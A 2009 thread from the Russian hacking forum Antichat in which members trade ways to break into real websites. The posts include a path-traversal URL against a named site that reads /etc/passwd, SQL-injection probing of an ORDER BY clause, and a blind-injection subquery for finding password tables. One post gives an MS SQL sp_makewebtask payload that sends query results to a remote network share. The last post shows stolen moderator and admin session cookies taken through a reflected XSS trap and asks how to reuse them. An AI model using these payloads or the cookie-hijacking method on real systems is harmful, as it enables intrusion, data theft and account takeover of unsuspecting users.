ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.10.2009, 07:20
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968
Репутация:
10
|
|
Сообщение от smth
Тут вообще его нет =\ похоже на ошибку в логике скрипта
Ясненько. В этом направлении и думал.
http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=../../../../../../../(...)/etc/passwd
А вот в этом скрипте инклюд конечно более важен, у меня есть исходники этого скрипта, не нашёл в нём никаких проверок на фильтрацию.. (.. /)
Может какой мод стоить или какая настройка апатча\пхп? Просто есть два хоста с этой тулзой, на обоих одинаковый результат при подставлении ../../ Пробывал url endec, результат такой же.
|
|
|
01.10.2009, 19:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Database query errorYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 limit 0,50' at line 1
вылазит при &script=post+order+by+1
за SQL - inj можно считать? и если да, то как ее реализовать
PS при этом имею к примеру
при &script=post все норма,
а если стави &script=post1
пишет Database query errorUnknown column 'post1 in 'order clause'
Последний раз редактировалось HAXTA4OK; 01.10.2009 в 19:28..
|
|
|
|
01.10.2009, 21:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
order by $script limit 0,50:
=>near 'order by 1 limit 0,50'
=>Unknown column 'post1 in ' order clause'
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
https://forum.antichat.ru/threadnav35207-1-10.html |
|
|
|
02.10.2009, 00:22
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Помогите плиз сформировать запрос по этому:
select id,DATE_FORMAT(date,'%d.%m.%Y') as date,toString,name,answer from _sa_prefix_database_guestbook where visible and published and exist and parent='172' order by position desc limit -40,10
А то, что-то не выходит сделать вывод печатного поля (( |
|
|
|
02.10.2009, 13:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
такой вопрос, имею слепую, знаю колонки , какой составить запрос что бы искать посимвольно имя таблицу в которой есть колока к примеру pass??
ЗЫ ElteRUS От тебя жду ответа =)
Последний раз редактировалось HAXTA4OK; 02.10.2009 в 13:26..
|
|
|
|
02.10.2009, 13:27
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
...(select table_name from information_schema.columns where column_name like 0x257061737325 limit 0,1)...
|
|
|
|
02.10.2009, 20:26
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Есть инъекция в MS SQL
Но отключен вывод ошибок
Что можно сделать?
Може как-то как в MySQL с union select 1,2,3,4?
Последний раз редактировалось Byrger; 02.10.2009 в 23:29..
|
|
|
|
03.10.2009, 12:00
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Сообщение от l1ght
order by $script limit 0,50:
=>near 'order by 1 limit 0,50'
=>Unknown column 'post1 in 'order clause'
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
https://forum.antichat.ru/threadnav35207-1-10.html
Смотри пункт 3.4 на http://forum.xaknet.ru/thread4556.html
Лично мне такое еще не попадалось.
|
|
|
|
03.10.2009, 12:05
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Сообщение от Byrger
Есть инъекция в MS SQL
Но отключен вывод ошибок
Что можно сделать?
Може как-то как в MySQL с union select 1,2,3,4?
Что-то мне сегодня захотелось сделать что-нибудь полезное
Можно использовать sp_makewebtask, чтобы записать ваш запрос в HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
Указываемый IP должен иметь папку "share" с доступом для Everyone.
Хотя помнится я как-то и с union select развлекался, правда в postgres sql но погоды это не делает, ибо что в постгрис что в мсскл нужно чтобы типы всех параметров совпадали, так что не компостируй себе мозГ, читай http://www.securitylab.ru/analytics/216211.php
|
|
|
|
03.10.2009, 12:50
|
|
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942
Репутация:
350
|
|
здрасте всем... нашёл пасивку на одном ресурсе... суть такова, стоит самописный сайт и пхпбб. дело в том что юзеры на сайте и на форуме логинятся под одним ником, кукисы такие как у пхпбб. дело в том что смог угнать модера
куки у него вот такого вида
Код:
iua=1; b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; ; phpbb2mysql_sid=dc4b2038e838e83c1789c49dc4960b4d
Потом смог же заманить на пасивку и админа но у него в куках присутствует еше какое то поле
Код:
; phpbb2mysql_sid=6c5ea6d3269f4ba89585ecb7547090db; phpbb2mysql_t=a:2:{i:12062;i:1254481197;i:12078;i:1254507094;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";i:-1;}; iua=1; b=b
Вот вопрос, как мне в опере или в другом браузере добавить такое поле? в опере на сколько я понял можно менять существующие поля, но новые создавать нельзя...
з.ы. пробовал переименововать поле b но ничего не получалось, после обновления страницы я становился неавторизованым |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
